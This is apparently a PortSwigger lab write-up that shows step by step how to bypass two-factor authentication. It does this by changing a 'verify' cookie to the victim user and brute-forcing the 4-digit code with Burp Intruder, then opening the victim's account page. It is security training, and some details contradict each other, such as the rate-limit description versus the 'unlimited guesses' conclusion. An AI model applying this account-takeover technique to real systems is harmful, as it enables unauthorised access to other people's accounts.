Skip to main content

🗂️PortSwigger Lab Writeup: 2FA Bypass using a Brute-Force Attack

PortSwigger lab banner: 2FA bypass using a brute-force attack

🎯 Objective

The objective of this lab is to exploit an multi-factor authentication weakness where the app is vulnerable to brute-forcing. The goal is to bypass the authentication of carlos and log in to the account.

  • Lab URL: https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-bypass-using-a-brute-force-attack
  • Category: Authentication
  • Difficulty: Expert

🧪 Exploitation Steps

🕵️Step 1: Observe the Website

  • Firstly open the lab URL in your browser, and observe what it is about and how it works. Lab homepage screenshot showing site layout
    Login page screenshot for the vulnerable application
  • At first glance, the website seems to be a blogging website with a login page. In the lab description, it is mentioned that we need to bruteforce the password of user - carlos and log in to account.

📝Step 2: Try MFA

  • Now we will first observe how multi-factor authentication works by logging in as carlos:montoya. Login attempt for carlos (carlos) captured in Burp
  • Now, we are being redirected to /login2 page for entering OTP sent on mail.
  • Since, we don't have access to Email Client, try guessing OTPs and see how rate limiting is done. Login2 page showing OTP entry and rate-limiting after failures
  • Now, after 3 failed attempts, we are again sent back on /login page for entering credentials again.
  • Therefore, after every 3 attempts, we must perform the whole process of authentication again.

🚀Step 3: Brute-Force MFA code

  • Now send the GET /login2 request from HTTP history to Repeater through Ctrl + R Repeater capture of GET /login2 request from HTTP history
  • Change the cookie verify:wiener to verify:carlos and send the request to generate the 2FA code. Request with cookie changed from verify to verify in Repeater
  • Now send the POST /login2 request from HTTP history to Intruder through Ctrl + I Intruder capture of POST /login2 request ready for brute-force
  • Change the cookie verify:wiener to verify:carlos to crack the 2FA code for carlos
  • Add the marker on mfa-code value and set the attack type to Sniper. Intruder marker placed on mfa-code field (Sniper attack)
  • In payloads section, set the payload type to Brute forcer
  • Set the character set to 0123456789 and Min/Max length to 4 as mfa code is of 4 digit. Intruder brute-forcer settings: digits 0-9, length 4
  • After configuring everything, start the attack. Intruder results showing 302 Found redirect on successful OTP guess
  • In all the payloads, you will see a unique response 302 Found which means we have successfully cracked the MFA code for carlos

🧑‍💼Step 4: Log in as carlos

  • Enter the credentials carlos:montoya in login page and send the request. Login form filled with carlos credentials (carlos)
  • Now change the URL from /login2 to /myaccount?id=carlos
  • Hence, we are now successfully being logged in as carlos without completing 2FA.
  • Now, Right-click on this request and select Show response in browser. Copy the URL and load it in the browser. Browser view of account page after navigating to /myaccount?id=carlos without completing 2FA
  • And Finally, the Lab is solved.

🧠 Conclusion

  • This lab involves a weak 2FA implementation, where the OTP verification step lacks proper brute-force protection and rate limiting.
  • Since the application allows unlimited OTP guesses, an attacker can use automated tools like Intruder to iterate through all 4-digit codes and find the valid one.
  • By brute-forcing the OTP for carlos and observing the 302 Found response, we successfully bypassed MFA and accessed his account.